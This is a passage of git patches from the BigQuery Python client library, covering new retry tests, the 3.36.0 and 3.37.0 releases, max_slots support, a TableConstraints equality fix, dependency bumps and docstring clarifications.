+ assert expected == actual diff --git a/tests/unit/test_client_retry.py b/tests/unit/test_client_retry.py new file mode 100644 index 000000000..6e49cc464 --- /dev/null +++ b/tests/unit/test_client_retry.py @@ -0,0 +1,279 @@ +# Copyright 2025 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from unittest import mock + +import freezegun +import google.api_core.exceptions +from google.cloud.bigquery import job as bqjob +from google.cloud.bigquery.retry import DEFAULT_RETRY +from .helpers import make_connection + + +PROJECT = "test-project" + + +def _make_credentials(): + import google.auth.credentials + + return mock.Mock(spec=google.auth.credentials.Credentials) + + +def _make_client(*args, **kw): + from google.cloud.bigquery.client import Client + + return Client(*args, **kw) + + +def test_get_service_account_email_w_custom_retry(global_time_lock): + api_path = f"/projects/{PROJECT}/serviceAccount" + creds = _make_credentials() + http = object() + client = _make_client(project=PROJECT, credentials=creds, _http=http) + + resource = { + "kind": "bigquery#getServiceAccountResponse", + "email": "bq-123@bigquery-encryption.iam.gserviceaccount.com", + } + api_request_patcher = mock.patch.object( + client._connection, + "api_request", + side_effect=[ValueError, resource], + ) + + retry = DEFAULT_RETRY.with_deadline(1).with_predicate( + lambda exc: isinstance(exc, ValueError) + ) + + with api_request_patcher as fake_api_request: + with mock.patch( + "google.cloud.bigquery.opentelemetry_tracing._get_final_span_attributes" + ) as final_attributes: + service_account_email = client.get_service_account_email( + retry=retry, timeout=7.5 + ) + + final_attributes.assert_called_once_with({"path": api_path}, client, None) + assert service_account_email == "bq-123@bigquery-encryption.iam.gserviceaccount.com" + assert fake_api_request.call_args_list == [ + mock.call(method="GET", path=api_path, timeout=7.5), + mock.call(method="GET", path=api_path, timeout=7.5), # was retried once + ] + + +def test_call_api_applying_custom_retry_on_timeout(global_time_lock): + from concurrent.futures import TimeoutError + + creds = _make_credentials() + client = _make_client(project=PROJECT, credentials=creds) + + api_request_patcher = mock.patch.object( + client._connection, + "api_request", + side_effect=[TimeoutError, "result"], + ) + retry = DEFAULT_RETRY.with_deadline(1).with_predicate( + lambda exc: isinstance(exc, TimeoutError) + ) + + with api_request_patcher as fake_api_request: + result = client._call_api(retry, foo="bar") + + assert result == "result" + assert fake_api_request.call_args_list == [ + mock.call(foo="bar"), + mock.call(foo="bar"), + ] + + +def test_query_job_rpc_fail_w_conflict_random_id_job_fetch_retries_404( + global_time_lock, +): + """Regression test for https://github.com/googleapis/python-bigquery/issues/2134 + + Sometimes after a Conflict, the fetch fails with a 404, but we know + because of the conflict that really the job does exist. Retry until we + get the job status (or timeout). + """ + job_id = "abc123" + creds = _make_credentials() + http = object() + client = _make_client(project=PROJECT, credentials=creds, _http=http) + conn = client._connection = make_connection( + # We're mocking QueryJob._begin, so this is only going to be + # jobs.get requests and responses. + google.api_core.exceptions.TooManyRequests("this is retriable by default"), + google.api_core.exceptions.NotFound("we lost your job"), + google.api_core.exceptions.NotFound("we lost your job again, sorry"), + { + "jobReference": { + "projectId": PROJECT, + "location": "TESTLOC", + "jobId": job_id, + } + }, + ) + + job_create_error = google.api_core.exceptions.Conflict("Job already exists.") + job_begin_patcher = mock.patch.object( + bqjob.QueryJob, "_begin", side_effect=job_create_error + ) + job_id_patcher = mock.patch.object( + google.cloud.bigquery._job_helpers, + "make_job_id", + return_value=job_id, + ) + + with job_begin_patcher, job_id_patcher: + # If get job request fails there does exist a job + # with this ID already, retry 404 until we get it (or fails for a + # non-retriable reason, see other tests). + result = client.query("SELECT 1;", job_id=None) + + jobs_get_path = mock.call( + method="GET", + path=f"/projects/{PROJECT}/jobs/{job_id}", + query_params={ + "projection": "full", + }, + timeout=google.cloud.bigquery.retry.DEFAULT_GET_JOB_TIMEOUT, + ) + conn.api_request.assert_has_calls( + # Double-check that it was jobs.get that was called for each of our + # mocked responses. + [jobs_get_path] + * 4, + ) + assert result.job_id == job_id + + +def test_query_job_rpc_fail_w_conflict_random_id_job_fetch_retries_404_and_query_job_insert( + global_time_lock, +): + """Regression test for https://github.com/googleapis/python-bigquery/issues/2134 + + Sometimes after a Conflict, the fetch fails with a 404. If it keeps + failing with a 404, assume that the job actually doesn't exist. + """ + job_id_1 = "abc123" + job_id_2 = "xyz789" + creds = _make_credentials() + http = object() + client = _make_client(project=PROJECT, credentials=creds, _http=http) + + # We're mocking QueryJob._begin, so that the connection should only get + # jobs.get requests. + job_create_error = google.api_core.exceptions.Conflict("Job already exists.") + job_begin_patcher = mock.patch.object( + bqjob.QueryJob, "_begin", side_effect=job_create_error + ) + conn = client._connection = make_connection( + google.api_core.exceptions.NotFound("we lost your job again, sorry"), + { + "jobReference": { + "projectId": PROJECT, + "location": "TESTLOC", + "jobId": job_id_2, + } + }, + ) + + # Choose a small deadline so the 404 retries give up. + retry = google.cloud.bigquery.retry._DEFAULT_GET_JOB_CONFLICT_RETRY.with_deadline(1) + job_id_patcher = mock.patch.object( + google.cloud.bigquery._job_helpers, + "make_job_id", + side_effect=[job_id_1, job_id_2], + ) + retry_patcher = mock.patch.object( + google.cloud.bigquery.retry, + "_DEFAULT_GET_JOB_CONFLICT_RETRY", + retry, + ) + + with freezegun.freeze_time( + "2025-01-01 00:00:00", + # 10x the retry deadline to guarantee a timeout. + auto_tick_seconds=10, + ), job_begin_patcher, job_id_patcher, retry_patcher: + # If get job request fails there does exist a job + # with this ID already, retry 404 until we get it (or fails for a + # non-retriable reason, see other tests). + result = client.query("SELECT 1;", job_id=None) + + jobs_get_path_1 = mock.call( + method="GET", + path=f"/projects/{PROJECT}/jobs/{job_id_1}", + query_params={ + "projection": "full", + }, + timeout=google.cloud.bigquery.retry.DEFAULT_GET_JOB_TIMEOUT, + ) + jobs_get_path_2 = mock.call( + method="GET", + path=f"/projects/{PROJECT}/jobs/{job_id_2}", + query_params={ + "projection": "full", + }, + timeout=google.cloud.bigquery.retry.DEFAULT_GET_JOB_TIMEOUT, + ) + conn.api_request.assert_has_calls( + # Double-check that it was jobs.get that was called for each of our + # mocked responses. + [jobs_get_path_1, jobs_get_path_2], + ) + assert result.job_id == job_id_2 + + +def test_query_job_rpc_fail_w_conflict_random_id_job_fetch_retry(global_time_lock): + """Regression test for https://github.com/googleapis/python-bigquery/issues/2134 + + If we get a 409 conflict on jobs.insert, and we are using a random + job ID, we should retry by getting the job by ID. This test ensures that + if the get job by ID fails, we retry the whole sequence. + """ + from google.cloud.bigquery import job + + client = _make_client(project=PROJECT, credentials=_make_credentials()) + job_id = "some-random-job-id" + query_text = "SELECT 1" + job_config = job.QueryJobConfig() + job_config.use_legacy_sql = False + + job_resource = { + "jobReference": {"projectId": PROJECT, "jobId": job_id}, + "configuration": {"query": {"query": query_text}}, + "status": {"state": "DONE"}, + } + + conn = make_connection( + # First attempt at jobs.insert fails with a 409 + google.api_core.exceptions.Conflict("Job already exists."), + # First attempt at jobs.get fails with a 500 + google.api_core.exceptions.InternalServerError("get job failed"), + # Second attempt at jobs.insert succeeds + job_resource, + ) + client._connection = conn + + job_id_patcher = mock.patch.object( + google.cloud.bigquery._job_helpers, + "make_job_id", + return_value=job_id, + ) + + with job_id_patcher: + query_job = client.query(query_text, job_config=job_config, job_id=None) + + assert query_job.job_id == job_id diff --git a/tests/unit/test_job_retry.py b/tests/unit/test_job_retry.py index 7144c640b..7343fed3d 100644 --- a/tests/unit/test_job_retry.py +++ b/tests/unit/test_job_retry.py @@ -80,7 +80,7 @@ ), ], ) -def test_retry_failed_jobs(sleep, reason, job_retry, result_retry): +def test_retry_failed_jobs(sleep, reason, job_retry, result_retry, global_time_lock): client = make_client() err = dict(reason=reason) conn = client._connection = make_connection( @@ -138,7 +138,7 @@ def test_retry_failed_jobs(sleep, reason, job_retry, result_retry): def test_retry_connection_error_with_default_retries_and_successful_first_job( - monkeypatch, client + monkeypatch, client, global_time_lock ): """ Make sure ConnectionError can be retried at `is_job_done` level, even if @@ -254,7 +254,7 @@ def make_job_id(*args, **kwargs): def test_query_retry_with_default_retry_and_ambiguous_errors_only_retries_with_failed_job( - client, monkeypatch + client, monkeypatch, global_time_lock ): """ Some errors like 'rateLimitExceeded' can be ambiguous. Make sure we only @@ -419,7 +419,7 @@ def make_job_id(*args, **kwargs): # - Pass None retry to `result`. @pytest.mark.parametrize("job_retry_on_query", ["Query", "Result"]) @mock.patch("time.sleep") -def test_disable_retry_failed_jobs(sleep, client, job_retry_on_query): +def test_disable_retry_failed_jobs(sleep, client, job_retry_on_query, global_time_lock): """ Test retry of job failures, as opposed to API-invocation failures. """ @@ -450,7 +450,7 @@ def api_request(method, path, query_params=None, data=None, **kw): @mock.patch("time.sleep") -def test_retry_failed_jobs_after_retry_failed(sleep, client): +def test_retry_failed_jobs_after_retry_failed(sleep, client, global_time_lock): """ If at first you don't succeed, maybe you will later. :) """ @@ -508,7 +508,7 @@ def api_request(method, path, query_params=None, data=None, **kw): assert job.job_id != orig_job_id -def test_raises_on_job_retry_on_query_with_non_retryable_jobs(client): +def test_raises_on_job_retry_on_query_with_non_retryable_jobs(client, global_time_lock): with pytest.raises( TypeError, match=( @@ -520,7 +520,9 @@ def test_raises_on_job_retry_on_query_with_non_retryable_jobs(client): client.query("select 42", job_id=42, job_retry=google.api_core.retry.Retry()) -def test_raises_on_job_retry_on_result_with_non_retryable_jobs(client): +def test_raises_on_job_retry_on_result_with_non_retryable_jobs( + client, global_time_lock +): client._connection = make_connection({}) with pytest.warns( @@ -542,7 +544,7 @@ def test_raises_on_job_retry_on_result_with_non_retryable_jobs(client): job.result(job_retry=google.api_core.retry.Retry()) -def test_query_and_wait_retries_job_for_DDL_queries(): +def test_query_and_wait_retries_job_for_DDL_queries(global_time_lock): """ Specific test for retrying DDL queries with "jobRateLimitExceeded" error: https://github.com/googleapis/python-bigquery/issues/1790 From 84fa75b3e52d41f3778c1654779f03598919168f Mon Sep 17 00:00:00 2001 From: "release-please[bot]" <55107282+release-please[bot]@users.noreply.github.com> Date: Wed, 20 Aug 2025 15:03:23 -0500 Subject: [PATCH 163/202] chore(main): release 3.36.0 (#2255) Co-authored-by: release-please[bot] <55107282+release-please[bot]@users.noreply.github.com> --- CHANGELOG.md | 14 ++++++++++++++ google/cloud/bigquery/version.py | 2 +- 2 files changed, 15 insertions(+), 1 deletion(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index 374448a5e..62352c344 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -5,6 +5,20 @@ [1]: https://pypi.org/project/google-cloud-bigquery/#history +## [3.36.0](https://github.com/googleapis/python-bigquery/compare/v3.35.1...v3.36.0) (2025-08-20) + + +### Features + +* Add created/started/ended properties to RowIterator. ([#2260](https://github.com/googleapis/python-bigquery/issues/2260)) ([0a95b24](https://github.com/googleapis/python-bigquery/commit/0a95b24192395cc3ccf801aa9bc318999873a2bf)) +* Retry query jobs if `jobBackendError` or `jobInternalError` are encountered ([#2256](https://github.com/googleapis/python-bigquery/issues/2256)) ([3deff1d](https://github.com/googleapis/python-bigquery/commit/3deff1d963980800e8b79fa3aaf5b712d4fd5062)) + + +### Documentation + +* Add a TROUBLESHOOTING.md file with tips for logging ([#2262](https://github.com/googleapis/python-bigquery/issues/2262)) ([b684832](https://github.com/googleapis/python-bigquery/commit/b68483227693ea68f6b12eacca2be1803cffb1d1)) +* Update README to break infinite redirect loop ([#2254](https://github.com/googleapis/python-bigquery/issues/2254)) ([8f03166](https://github.com/googleapis/python-bigquery/commit/8f031666114a826da2ad965f8ecd4727466cb480)) + ## [3.35.1](https://github.com/googleapis/python-bigquery/compare/v3.35.0...v3.35.1) (2025-07-21) diff --git a/google/cloud/bigquery/version.py b/google/cloud/bigquery/version.py index d565bc46e..a8f4c8e14 100644 --- a/google/cloud/bigquery/version.py +++ b/google/cloud/bigquery/version.py @@ -12,4 +12,4 @@ # See the License for the specific language governing permissions and # limitations under the License. -__version__ = "3.35.1" +__version__ = "3.36.0" From ef2740a158199633b5543a7b6eb19587580792cd Mon Sep 17 00:00:00 2001 From: shollyman Date: Tue, 26 Aug 2025 10:52:30 -0500 Subject: [PATCH 164/202] feat: updates to fastpath query execution (#2268) This PR updates query handling to allow base config properties like job timeout, reservation, and a preview max slots field to leverage the faster path (e.g. using jobs.query rather than jobs.insert). --- google/cloud/bigquery/_job_helpers.py | 3 ++ google/cloud/bigquery/job/base.py | 31 ++++++++++++++++++++ tests/unit/job/test_base.py | 41 +++++++++++++++++++++++++++ tests/unit/job/test_query_config.py | 5 ++++ tests/unit/test__job_helpers.py | 28 ++++++++++++++++++ 5 files changed, 108 insertions(+) diff --git a/google/cloud/bigquery/_job_helpers.py b/google/cloud/bigquery/_job_helpers.py index 6fd561f8c..27e90246f 100644 --- a/google/cloud/bigquery/_job_helpers.py +++ b/google/cloud/bigquery/_job_helpers.py @@ -658,6 +658,9 @@ def _supported_by_jobs_query(request_body: Dict[str, Any]) -> bool: "requestId", "createSession", "writeIncrementalResults", + "jobTimeoutMs", + "reservation", + "maxSlots", } unsupported_keys = request_keys - keys_allowlist diff --git a/google/cloud/bigquery/job/base.py b/google/cloud/bigquery/job/base.py index f007b9341..1344082be 100644 --- a/google/cloud/bigquery/job/base.py +++ b/google/cloud/bigquery/job/base.py @@ -224,6 +224,37 @@ def job_timeout_ms(self, value): else: self._properties.pop("jobTimeoutMs", None) + @property + def max_slots(self) -> Optional[int]: + """The maximum rate of slot consumption to allow for this job. + + If set, the number of slots used to execute the job will be throttled + to try and keep its slot consumption below the requested rate. + This feature is not generally available. + """ + + max_slots = self._properties.get("maxSlots") + if max_slots is not None: + if isinstance(max_slots, str): + return int(max_slots) + if isinstance(max_slots, int): + return max_slots + return None + + @max_slots.setter + def max_slots(self, value): + try: + value = _int_or_none(value) + except ValueError as err: + raise ValueError("Pass an int for max slots, e.g. 100").with_traceback( + err.__traceback__ + ) + + if value is not None: + self._properties["maxSlots"] = str(value) + else: + self._properties.pop("maxSlots", None) + @property def reservation(self): """str: Optional. The reservation that job would use. diff --git a/tests/unit/job/test_base.py b/tests/unit/job/test_base.py index f5861f645..420904820 100644 --- a/tests/unit/job/test_base.py +++ b/tests/unit/job/test_base.py @@ -1276,3 +1276,44 @@ def test_reservation_setter(self): job_config = self._make_one() job_config.reservation = "foo" self.assertEqual(job_config._properties["reservation"], "foo") + + def test_max_slots_miss(self): + job_config = self._make_one() + self.assertEqual(job_config.max_slots, None) + + def test_max_slots_set_and_clear(self): + job_config = self._make_one() + job_config.max_slots = 14 + self.assertEqual(job_config.max_slots, 14) + job_config.max_slots = None + self.assertEqual(job_config.max_slots, None) + + def test_max_slots_hit_str(self): + job_config = self._make_one() + job_config._properties["maxSlots"] = "4" + self.assertEqual(job_config.max_slots, 4) + + def test_max_slots_hit_int(self): + job_config = self._make_one() + job_config._properties["maxSlots"] = int(3) + self.assertEqual(job_config.max_slots, 3) + + def test_max_slots_hit_invalid(self): + job_config = self._make_one() + job_config._properties["maxSlots"] = object() + self.assertEqual(job_config.max_slots, None) + + def test_max_slots_update_in_place(self): + job_config = self._make_one() + job_config.max_slots = 45 # update in place + self.assertEqual(job_config.max_slots, 45) + + def test_max_slots_setter_invalid(self): + job_config = self._make_one() + with self.assertRaises(ValueError): + job_config.max_slots = "foo" + + def test_max_slots_setter(self): + job_config = self._make_one() + job_config.max_slots = 123 + self.assertEqual(job_config._properties["maxSlots"], "123") diff --git a/tests/unit/job/test_query_config.py b/tests/unit/job/test_query_config.py index e0878d067..a63a14b73 100644 --- a/tests/unit/job/test_query_config.py +++ b/tests/unit/job/test_query_config.py @@ -172,6 +172,11 @@ def test_incremental_results(self): config.write_incremental_results = True self.assertEqual(config.write_incremental_results, True) + def test_max_slots(self): + config = self._get_target_class()() + config.max_slots = 99 + self.assertEqual(config.max_slots, 99) + def test_create_session(self): config = self._get_target_class()() self.assertIsNone(config.create_session) diff --git a/tests/unit/test__job_helpers.py b/tests/unit/test__job_helpers.py index 1f543f033..10cbefe13 100644 --- a/tests/unit/test__job_helpers.py +++ b/tests/unit/test__job_helpers.py @@ -200,6 +200,19 @@ def make_query_response( make_query_request({"writeIncrementalResults": True}), id="job_config-with-incremental-results", ), + pytest.param( + job_query.QueryJobConfig( + reservation="foo", + max_slots=100, + ), + make_query_request( + { + "maxSlots": "100", + "reservation": "foo", + } + ), + id="job_config-with-reservation-and-slots", + ), ), ) def test__to_query_request(job_config, expected): @@ -1048,6 +1061,21 @@ def test_make_job_id_w_job_id_overrides_prefix(): True, id="write_incremental_results", ), + pytest.param( + job_query.QueryJobConfig(job_timeout_ms=1000), + True, + id="job_timeout_ms", + ), + pytest.param( + job_query.QueryJobConfig(reservation="foo"), + True, + id="reservation", + ), + pytest.param( + job_query.QueryJobConfig(max_slots=20), + True, + id="max_slots", + ), ), ) def test_supported_by_jobs_query_from_queryjobconfig( From 43527af24e56994357205b482a86b805950d2d0f Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Wed, 3 Sep 2025 18:27:17 +0200 Subject: [PATCH 165/202] chore(deps): update all dependencies (#2259) --- samples/desktopapp/requirements.txt | 2 +- samples/geography/requirements.txt | 10 +++++----- samples/magics/requirements.txt | 6 +++--- samples/notebooks/requirements.txt | 10 +++++----- samples/snippets/requirements.txt | 2 +- 5 files changed, 15 insertions(+), 15 deletions(-) diff --git a/samples/desktopapp/requirements.txt b/samples/desktopapp/requirements.txt index e7a02eca5..f86e57e5c 100644 --- a/samples/desktopapp/requirements.txt +++ b/samples/desktopapp/requirements.txt @@ -1,2 +1,2 @@ -google-cloud-bigquery==3.35.1 +google-cloud-bigquery==3.36.0 google-auth-oauthlib==1.2.2 diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index fa54cc229..c2bd74bed 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -1,7 +1,7 @@ attrs==25.3.0 certifi==2025.8.3 cffi==1.17.1 -charset-normalizer==3.4.2 +charset-normalizer==3.4.3 click===8.1.8; python_version == '3.9' click==8.2.1; python_version >= '3.10' click-plugins==1.1.1.2 @@ -13,7 +13,7 @@ geopandas===1.0.1; python_version <= '3.9' geopandas==1.1.1; python_version >= '3.10' google-api-core==2.25.1 google-auth==2.40.3 -google-cloud-bigquery==3.35.1 +google-cloud-bigquery==3.36.0 google-cloud-bigquery-storage==2.32.0 google-cloud-core==2.4.3 google-crc32c==1.7.1 @@ -24,7 +24,7 @@ idna==3.10 munch==4.0.0 mypy-extensions==1.1.0 packaging==25.0 -pandas==2.3.1 +pandas==2.3.2 proto-plus==1.26.1 pyarrow==21.0.0 pyasn1==0.6.1 @@ -34,11 +34,11 @@ pyparsing==3.2.3 python-dateutil==2.9.0.post0 pytz==2025.2 PyYAML==6.0.2 -requests==2.32.4 +requests==2.32.5 rsa==4.9.1 Shapely===2.0.7; python_version == '3.9' Shapely==2.1.1; python_version >= '3.10' six==1.17.0 -typing-extensions==4.14.1 +typing-extensions==4.15.0 typing-inspect==0.9.0 urllib3==2.5.0 diff --git a/samples/magics/requirements.txt b/samples/magics/requirements.txt index e7230053c..7b4f84e8e 100644 --- a/samples/magics/requirements.txt +++ b/samples/magics/requirements.txt @@ -1,6 +1,6 @@ -bigquery_magics==0.10.2 +bigquery_magics==0.10.3 db-dtypes==1.4.3 -google.cloud.bigquery==3.35.1 +google.cloud.bigquery==3.36.0 google-cloud-bigquery-storage==2.32.0 ipython===8.18.1 -pandas==2.3.1 +pandas==2.3.2 diff --git a/samples/notebooks/requirements.txt b/samples/notebooks/requirements.txt index 829f08f47..dc22903c7 100644 --- a/samples/notebooks/requirements.txt +++ b/samples/notebooks/requirements.txt @@ -1,9 +1,9 @@ -bigquery-magics==0.10.2 +bigquery-magics==0.10.3 db-dtypes==1.4.3 -google-cloud-bigquery==3.35.1 +google-cloud-bigquery==3.36.0 google-cloud-bigquery-storage==2.32.0 ipython===8.18.1; python_version == '3.9' -ipython==9.4.0; python_version >= '3.10' +ipython==9.5.0; python_version >= '3.10' matplotlib===3.9.2; python_version == '3.9' -matplotlib==3.10.5; python_version >= '3.10' -pandas==2.3.1 +matplotlib==3.10.6; python_version >= '3.10' +pandas==2.3.2 diff --git a/samples/snippets/requirements.txt b/samples/snippets/requirements.txt index afa62b6b8..23da68d60 100644 --- a/samples/snippets/requirements.txt +++ b/samples/snippets/requirements.txt @@ -1,2 +1,2 @@ # samples/snippets should be runnable with no "extras" -google-cloud-bigquery==3.35.1 +google-cloud-bigquery==3.36.0 From 435ecdb62d8402fea317763e48934fa510ce8026 Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Wed, 3 Sep 2025 14:30:49 -0400 Subject: [PATCH 166/202] bug: updates `__eq__` comparison on TableConstraint (#2274) * bug: updates __eq__ comparison on TableConstraint * updates tests * moves test out of class to accommodate pytest params --- google/cloud/bigquery/table.py | 6 +- tests/unit/test_table.py | 144 ++++++++++++++++----------------- 2 files changed, 71 insertions(+), 79 deletions(-) diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index 219b31467..5efcb1958 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -3574,9 +3574,9 @@ def __init__( def __eq__(self, other): if not isinstance(other, TableConstraints) and other is not None: raise TypeError("The value provided is not a BigQuery TableConstraints.") - return ( - self.primary_key == other.primary_key if other.primary_key else None - ) and (self.foreign_keys == other.foreign_keys if other.foreign_keys else None) + return self.primary_key == ( + other.primary_key if other.primary_key else None + ) and self.foreign_keys == (other.foreign_keys if other.foreign_keys else None) @classmethod def from_api_repr(cls, resource: Dict[str, Any]) -> "TableConstraints": diff --git a/tests/unit/test_table.py b/tests/unit/test_table.py index eb2c8d9ec..af31d116b 100644 --- a/tests/unit/test_table.py +++ b/tests/unit/test_table.py @@ -6322,82 +6322,6 @@ def test_constructor_explicit_with_none(self): self.assertIsNone(table_constraint.primary_key) self.assertIsNone(table_constraint.foreign_keys) - def test__eq__primary_key_mismatch(self): - from google.cloud.bigquery.table import ( - PrimaryKey, - ForeignKey, - TableReference, - ColumnReference, - ) - - foriegn_keys = [ - ForeignKey( - name="my_fk_id", - referenced_table=TableReference.from_string( - "my-project.my-dataset.my-table" - ), - column_references=[ - ColumnReference(referencing_column="id", referenced_column="id"), - ], - ), - ] - - table_constraint = self._make_one( - primary_key=PrimaryKey(columns=["my_pk_id"]), - foreign_keys=foriegn_keys, - ) - other_table_constraint = self._make_one( - primary_key=PrimaryKey(columns=["my_other_pk_id"]), - foreign_keys=foriegn_keys, - ) - - self.assertNotEqual(table_constraint, other_table_constraint) - - def test__eq__foreign_keys_mismatch(self): - from google.cloud.bigquery.table import ( - PrimaryKey, - ForeignKey, - TableReference, - ColumnReference, - ) - - primary_key = PrimaryKey(columns=["my_pk_id"]) - - table_constraint = self._make_one( - primary_key=primary_key, - foreign_keys=[ - ForeignKey( - name="my_fk_id", - referenced_table=TableReference.from_string( - "my-project.my-dataset.my-table" - ), - column_references=[ - ColumnReference( - referencing_column="id", referenced_column="id" - ), - ], - ), - ], - ) - other_table_constraint = self._make_one( - primary_key=primary_key, - foreign_keys=[ - ForeignKey( - name="my_other_fk_id", - referenced_table=TableReference.from_string( - "my-project.my-dataset.my-other-table" - ), - column_references=[ - ColumnReference( - referencing_column="other_id", referenced_column="other_id" - ), - ], - ), - ], - ) - - self.assertNotEqual(table_constraint, other_table_constraint) - def test__eq__other_type(self): from google.cloud.bigquery.table import ( PrimaryKey, @@ -6615,6 +6539,74 @@ def test_to_api_repr_empty_constraints(self): self.assertEqual(instance.to_api_repr(), expected) +@pytest.mark.parametrize( + "self_pk_name,self_fk_name,other_pk_name,other_fk_name,expected_equal", + [ + (None, None, None, None, True), + ("pkey", None, "pkey", None, True), + ("pkey", "fkey", "pkey", "fkey", True), + (None, "fkey", None, "fkey", True), + ("pkey", None, "pkey_no_match", None, False), + ("pkey", "fkey", "pkey_no_match", "fkey_no_match", False), + (None, "fkey", None, "fkey_no_match", False), + ("pkey", "fkey", "pkey_no_match", "fkey", False), + ("pkey", "fkey", "pkey", "fkey_no_match", False), + ], +) +def test_table_constraint_eq_parametrized( + self_pk_name, self_fk_name, other_pk_name, other_fk_name, expected_equal +): + # Imports are placed here to ensure they are self-contained for this example. + # In a real test file, they would likely be at the top of the file. + from google.cloud.bigquery.table import ( + ColumnReference, + ForeignKey, + PrimaryKey, + TableReference, + TableConstraints, + ) + + # Helper function to create a PrimaryKey object or None + def _create_primary_key(name): + if name is None: + return None + return PrimaryKey(columns=[name]) + + # Helper function to create a list of ForeignKey objects or None + def _create_foreign_keys(name): + if name is None: + return None + # Using a generic referenced_table and column_references for simplicity + # The 'name' parameter ensures different ForeignKey objects for different names + return [ + ForeignKey( + name=name, + referenced_table=TableReference.from_string( + f"my-project.my-dataset.{name}_referenced_table" + ), + column_references=[ + ColumnReference( + referencing_column=f"{name}_ref_col", + referenced_column=f"{name}_pk_col", + ) + ], + ) + ] + + # Create the two TableConstraints instances for comparison + tc1 = TableConstraints( + primary_key=_create_primary_key(self_pk_name), + foreign_keys=_create_foreign_keys(self_fk_name), + ) + tc2 = TableConstraints( + primary_key=_create_primary_key(other_pk_name), + foreign_keys=_create_foreign_keys(other_fk_name), + ) + + # Assert the equality based on the expected outcome + assert (tc1 == tc2) == expected_equal + + class TestExternalCatalogTableOptions: PROJECT = "test-project" DATASET_ID = "test_dataset" From 8a13c12905ffcb3dbb6086a61df37556f0c2cd31 Mon Sep 17 00:00:00 2001 From: shollyman Date: Thu, 4 Sep 2025 13:25:49 -0500 Subject: [PATCH 167/202] docs: clarify the api_method arg for client.query() (#2277) * docs: clarify the api_method arg for client.query() --- google/cloud/bigquery/client.py | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/google/cloud/bigquery/client.py b/google/cloud/bigquery/client.py index 4ca2cb428..ea592852a 100644 --- a/google/cloud/bigquery/client.py +++ b/google/cloud/bigquery/client.py @@ -3519,7 +3519,8 @@ def query( specified here becomes the default ``job_retry`` for ``result()``, where it can also be specified. api_method (Union[str, enums.QueryApiMethod]): - Method with which to start the query job. + Method with which to start the query job. By default, + the jobs.insert API is used for starting a query. See :class:`google.cloud.bigquery.enums.QueryApiMethod` for details on the difference between the query start methods. From 33ea29616c06a2e2a106a785d216e784737ae386 Mon Sep 17 00:00:00 2001 From: Lingqing Gan Date: Sat, 6 Sep 2025 10:16:44 -0700 Subject: [PATCH 168/202] fix: remove deepcopy while setting properties for _QueryResults (#2280) --- google/cloud/bigquery/query.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/google/cloud/bigquery/query.py b/google/cloud/bigquery/query.py index 7f70f6a2a..170ed2976 100644 --- a/google/cloud/bigquery/query.py +++ b/google/cloud/bigquery/query.py @@ -1400,7 +1400,7 @@ def _set_properties(self, api_response): api_response (Dict): Response returned from an API call """ self._properties.clear() - self._properties.update(copy.deepcopy(api_response)) + self._properties.update(api_response) def _query_param_from_api_repr(resource): From 6e88d7dbe42ebfc35986da665d656b49ac481db4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Tim=20Swe=C3=B1a=20=28Swast=29?= Date: Mon, 8 Sep 2025 09:58:27 -0500 Subject: [PATCH 169/202] docs: clarify that the presence of `XyzJob.errors` doesn't necessarily mean that the job has not completed or was unsuccessful (#2278) Internal issue b/440349994 --- google/cloud/bigquery/job/base.py | 22 +++++++++++++++++++--- 1 file changed, 19 insertions(+), 3 deletions(-) diff --git a/google/cloud/bigquery/job/base.py b/google/cloud/bigquery/job/base.py index 1344082be..9b7ddb82d 100644 --- a/google/cloud/bigquery/job/base.py +++ b/google/cloud/bigquery/job/base.py @@ -693,7 +693,12 @@ def transaction_info(self) -> Optional[TransactionInfo]: @property def error_result(self): - """Error information about the job as a whole. + """Output only. Final error result of the job. + + If present, indicates that the job has completed and was unsuccessful. + + See: + https://cloud.google.com/bigquery/docs/reference/rest/v2/Job#JobStatus.FIELDS.error_result Returns: Optional[Mapping]: the error information (None until set from the server). @@ -704,7 +709,13 @@ def error_result(self): @property def errors(self): - """Information about individual errors generated by the job. + """Output only. The first errors encountered during the running of the job. + + The final message includes the number of errors that caused the process to stop. + Errors here do not necessarily mean that the job has not completed or was unsuccessful. + + See: + https://cloud.google.com/bigquery/docs/reference/rest/v2/Job#JobStatus.FIELDS.errors Returns: Optional[List[Mapping]]: @@ -716,7 +727,12 @@ def errors(self): @property def state(self): - """Status of the job. + """Output only. Running state of the job. + + Valid states include 'PENDING', 'RUNNING', and 'DONE'. + + See: + https://cloud.google.com/bigquery/docs/reference/rest/v2/Job#JobStatus.FIELDS.state Returns: Optional[str]: From 4b0ef0cfcf7def138e43a22223abfcbefc330da2 Mon Sep 17 00:00:00 2001 From: "release-please[bot]" <55107282+release-please[bot]@users.noreply.github.com> Date: Tue, 9 Sep 2025 10:01:33 -0700 Subject: [PATCH 170/202] chore(main): release 3.37.0 (#2269) Co-authored-by: release-please[bot] <55107282+release-please[bot]@users.noreply.github.com> --- CHANGELOG.md | 18 ++++++++++++++++++ google/cloud/bigquery/version.py | 2 +- 2 files changed, 19 insertions(+), 1 deletion(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index 62352c344..fe721dfde 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -5,6 +5,24 @@ [1]: https://pypi.org/project/google-cloud-bigquery/#history +## [3.37.0](https://github.com/googleapis/python-bigquery/compare/v3.36.0...v3.37.0) (2025-09-08) + + +### Features + +* Updates to fastpath query execution ([#2268](https://github.com/googleapis/python-bigquery/issues/2268)) 